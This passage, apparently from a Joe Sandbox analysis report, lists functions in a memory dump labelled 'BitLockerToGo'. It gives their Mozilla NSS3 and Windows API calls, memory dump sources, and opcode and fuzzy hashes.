                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C), ref: 6CAD2F9E
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD2FCA
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD301A
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD302E
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD3066
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD3085
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD30EC
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD310C
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C), ref: 6CAD3124
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD314C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAB9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CAE379E,?,6CAB9568,00000000,?,6CAE379E,?,00000001,?), ref: 6CAB918D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAB9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CAE379E,?,6CAB9568,00000000,?,6CAE379E,?,00000001,?), ref: 6CAB91A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD316D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 846c11f4d9d50d23caecbcbde56dc5efd84f89b83e27394d2b9f09f2b7debfa5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 24fbefd7f7c4c1952ae44e07334e3345a69a980a10c9e4eae39a55528a2778fc
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846c11f4d9d50d23caecbcbde56dc5efd84f89b83e27394d2b9f09f2b7debfa5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF19DB5D012199FDF00DFA8E884B9DBBB4FF09318F094268E854A7711EB31E995CB91
                                                                                                                                                                                                                                                                                                                    Function 6CAD6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CAD6943
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CAD6957
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CAD6972
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CAD6983
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CAD69AA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CAD69BE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CAD69D2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CAD69DF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CAD6A5B
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAD6D8C
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6DC5
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6DD6
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6DE7
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAD6E1F
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6E4B
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6E72
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6EA7
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6EC4
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6ED5
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6EE3
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6EF4
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6F08
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6F35
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6F44
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6F5B
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6F65
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAD781D,00000000,6CACBE2C,?,6CAD6B1D,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C40
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAD781D,?,6CACBE2C,?), ref: 6CAD6C58
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C6F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAD6C84
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAD6C96
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAD6CAA
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6F90
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6FC5
                                                                                                                                                                                                                                                                                                                    • PK11_GetInternalKeySlot.NSS3 ref: 6CAD6FF4
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1304971872-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 15db761ab09c5aad81d7a0456256d285ae0a61f1eb838d874b59cafeb2152cfe
                                                                                                                                                                                                                                                                                                                    • Instruction ID: cd2d041f74d232a77d3f572bf865650c8150c02d739e88bbb902c9d29c3ed544
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15db761ab09c5aad81d7a0456256d285ae0a61f1eb838d874b59cafeb2152cfe
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADB160B0E0121A9FDF00CFA5D844B9EBBB4AF09748F1A0925E815E7701EB31F994CB61
                                                                                                                                                                                                                                                                                                                    Function 6CAD4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD4C4C
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD4C60
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CA1
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CBE
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CD2
                                                                                                                                                                                                                                                                                                                    • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4D3A
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4D4F
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4DB7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD4DD7
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD4DEC
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD4E1B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD4E2F
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4E5A
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD4E71
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD4E7A
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD4EA2
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD4EC1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD4ED6
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD4F01
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD4F2A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 600bba5d181b268f0ca71ecd1393335ef2d7e50fcd1c2f6b891f2a1f13b74b7f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 81e94afeb7b10dafa99526643b5f5091c1c0be4feaf9f905a21ea51a21f2eb9f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 600bba5d181b268f0ca71ecd1393335ef2d7e50fcd1c2f6b891f2a1f13b74b7f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DB1C175A00206AFDB01EF68E885BAE77B4BF09318F094124ED1597B51EB34F9A4CBD1
                                                                                                                                                                                                                                                                                                                    Function 6CB26E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB26BF7), ref: 6CB26EB6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: TlsGetValue.KERNEL32(00000040,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81267
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: EnterCriticalSection.KERNEL32(?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA8127C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81291
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: PR_Unlock.NSS3(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA812A0
                                                                                                                                                                                                                                                                                                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBCFC0A,6CB26BF7), ref: 6CB26ECD
                                                                                                                                                                                                                                                                                                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB26EE0
                                                                                                                                                                                                                                                                                                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB26EFC
                                                                                                                                                                                                                                                                                                                    • PR_NewLock.NSS3 ref: 6CB26F04
                                                                                                                                                                                                                                                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB26F18
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB26BF7), ref: 6CB26F30
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB26BF7), ref: 6CB26F54
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB26BF7), ref: 6CB26FE0
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB26BF7), ref: 6CB26FFD
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • SSLFORCELOCKS, xrefs: 6CB26F2B
                                                                                                                                                                                                                                                                                                                    • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB26FDB
                                                                                                                                                                                                                                                                                                                    • SSLKEYLOGFILE, xrefs: 6CB26EB1
                                                                                                                                                                                                                                                                                                                    • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CB26F4F
                                                                                                                                                                                                                                                                                                                    • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB26FF8
                                                                                                                                                                                                                                                                                                                    • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CB26EF7
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                                                                                    • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                                                                                    • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b309e8789896ed391f567787daee472658b77753eccfc6ff6d157922c859a40
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e7aaaedec68aeafe9964d3ad90e25a6c7b0075e08d44238b82449d09319ba95c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b309e8789896ed391f567787daee472658b77753eccfc6ff6d157922c859a40
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CA129B2A658D087EB10463CEC007B937E1AB83339F584365E839D7FD4DBBD94418256
                                                                                                                                                                                                                                                                                                                    Function 6CA98E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA98E5B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA98E81
                                                                                                                                                                                                                                                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA98EED
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBC18D0,?), ref: 6CA98F03
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CA98F19
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CA98F2B
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA98F53
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA98F65
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CA98FA1
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(?), ref: 6CA98FFE
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CA99012
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CA99024
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CA9902C
                                                                                                                                                                                                                                                                                                                    • PORT_DestroyCheapArena.NSS3(?), ref: 6CA9903E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                                                                                    • String ID: security
                                                                                                                                                                                                                                                                                                                    • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c88535d1dfc072352596b61aee8215121fafc75f6437ae8ac6b5939550487643
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 94a43e55db755b9416a256078de858e7fc5ed2838b7cf921154ba83961cd7ae4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c88535d1dfc072352596b61aee8215121fafc75f6437ae8ac6b5939550487643
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B85158B5618340ABD7009A58DD42FBF73E8AF8535CF48082EF5A997B40E731D9898763
                                                                                                                                                                                                                                                                                                                    Function 6CB5CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB5CC7B), ref: 6CB5CD7A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CACC1A8,?), ref: 6CB5CE92
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB5CDA5
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB5CDB8
                                                                                                                                                                                                                                                                                                                    • PR_UnloadLibrary.NSS3(00000000), ref: 6CB5CDDB
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB5CD8E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA805C0: PR_EnterMonitor.NSS3 ref: 6CA805D1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA805C0: PR_ExitMonitor.NSS3 ref: 6CA805EA
